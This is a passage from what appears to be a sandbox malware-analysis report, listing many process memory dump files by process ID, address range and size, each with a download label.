                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/484-228-0x00000210D4F50000-0x00000210D4F52000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/484-230-0x00000210D4F50000-0x00000210D4F52000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/660-195-0x00000000041E0000-0x00000000041F0000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                64KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/660-189-0x0000000003000000-0x0000000003010000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                64KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/660-131-0x0000000000380000-0x0000000000383000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                12KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1076-222-0x00000250E6600000-0x00000250E6602000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1076-220-0x00000250E6600000-0x00000250E6602000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1076-225-0x00000250E6D80000-0x00000250E6DF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1192-318-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                12KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1224-240-0x000002C863EF0000-0x000002C863EF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1224-249-0x000002C8643B0000-0x000002C864422000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1224-239-0x000002C863EF0000-0x000002C863EF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1244-138-0x000000000084F000-0x0000000000914000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                788KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1244-175-0x0000000000A30000-0x0000000000B9F000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.4MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1244-176-0x0000000000400000-0x0000000000579000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.5MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1256-242-0x0000023FCF0B0000-0x0000023FCF0B2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1256-250-0x0000023FCF420000-0x0000023FCF492000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1256-241-0x0000023FCF0B0000-0x0000023FCF0B2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1388-235-0x0000016645F20000-0x0000016645F22000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1388-236-0x0000016645F20000-0x0000016645F22000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1388-247-0x00000166467C0000-0x0000016646832000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1636-201-0x0000000005550000-0x000000000569C000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.3MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1824-237-0x000001E8773C0000-0x000001E8773C2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1824-238-0x000001E8773C0000-0x000001E8773C2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/1824-248-0x000001E878140000-0x000001E8781B2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-349-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-357-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-368-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-363-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-366-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-351-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-369-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-360-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2016-355-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2156-205-0x00000000044F0000-0x000000000454D000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                372KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2156-204-0x0000000004590000-0x0000000004691000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.0MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2252-352-0x00000000772E0000-0x000000007746E000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.6MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2312-185-0x0000000000400000-0x00000000016C8000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                18.8MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2312-151-0x0000000001889000-0x00000000018A5000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                112KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2312-186-0x0000000001820000-0x0000000001850000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                192KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2392-234-0x0000027EF2740000-0x0000027EF27B2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2392-217-0x0000027EF1B90000-0x0000027EF1B92000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2392-218-0x0000027EF1B90000-0x0000027EF1B92000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2420-231-0x000001CAEB520000-0x000001CAEB592000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2420-215-0x000001CAEB2A0000-0x000001CAEB2A2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2420-216-0x000001CAEB2A0000-0x000001CAEB2A2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-347-0x0000000000400000-0x00000000007BB000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                3.7MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-341-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-328-0x0000000002870000-0x0000000002871000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-336-0x0000000002860000-0x0000000002861000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-325-0x0000000002850000-0x0000000002851000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-344-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-348-0x0000000000400000-0x00000000007BB000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                3.7MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-324-0x0000000002630000-0x0000000002631000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-307-0x0000000002310000-0x0000000002370000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                384KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-329-0x0000000002830000-0x0000000002831000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-333-0x0000000002820000-0x0000000002821000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-334-0x0000000002890000-0x0000000002891000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-326-0x0000000002800000-0x0000000002801000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-337-0x0000000003530000-0x0000000003531000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2452-323-0x0000000002840000-0x0000000002841000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2588-209-0x000002645C6C0000-0x000002645C732000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2588-208-0x000002645BBF0000-0x000002645BBF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2588-207-0x000002645BBF0000-0x000002645BBF2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2588-206-0x000002645C600000-0x000002645C64D000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                308KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2692-243-0x000001D82D8D0000-0x000001D82D8D2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2692-251-0x000001D82E100000-0x000001D82E172000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2708-252-0x0000017850F40000-0x0000017850FB2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-183-0x0000000002734000-0x0000000002736000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-145-0x0000000000AA6000-0x0000000000AC9000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                140KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-162-0x0000000005350000-0x0000000005351000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-181-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-187-0x0000000005B40000-0x0000000005B41000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-163-0x0000000000400000-0x000000000088B000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4.5MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-158-0x0000000002960000-0x000000000297D000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                116KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-178-0x00000000059B0000-0x00000000059B1000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-160-0x00000000008D0000-0x0000000000900000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                192KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-157-0x0000000004E50000-0x0000000004E51000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-168-0x0000000002730000-0x0000000002731000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-156-0x0000000002690000-0x00000000026AF000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                124KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-170-0x0000000002732000-0x0000000002733000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-171-0x0000000002733000-0x0000000002734000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/2832-174-0x0000000005980000-0x0000000005981000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3012-274-0x0000024286F00000-0x0000024287005000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                1.0MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3012-273-0x0000024285FA0000-0x0000024285FBB000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                108KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3012-227-0x00000242845E0000-0x0000024284652000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                456KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3012-213-0x00000242846A0000-0x00000242846A2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3012-214-0x00000242846A0000-0x00000242846A2000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3312-119-0x0000000002FE0000-0x0000000002FE1000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3312-118-0x0000000002FE0000-0x0000000002FE1000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-169-0x0000000000400000-0x00000000016D3000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                18.8MB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-184-0x0000000003804000-0x0000000003806000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-166-0x0000000003680000-0x000000000369D000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                116KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-159-0x00000000034E0000-0x00000000034FF000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                124KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-161-0x0000000001850000-0x0000000001880000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                192KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-177-0x00000000069F0000-0x00000000069F1000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-167-0x0000000003803000-0x0000000003804000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-172-0x0000000003800000-0x0000000003801000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3500-165-0x0000000003802000-0x0000000003803000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3948-141-0x0000000000610000-0x0000000000611000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3948-146-0x0000000000C30000-0x0000000000C31000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/3948-155-0x0000000004E50000-0x0000000004E51000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                                Download

                                                                                                                                                                              • memory/4036-371-0x0000000000440000-0x00000000004EE000-memory.dmp

                                                                                                                                                                                Filesize

                                                                                                                                                                                696KB

                                                                                                                                                                                Download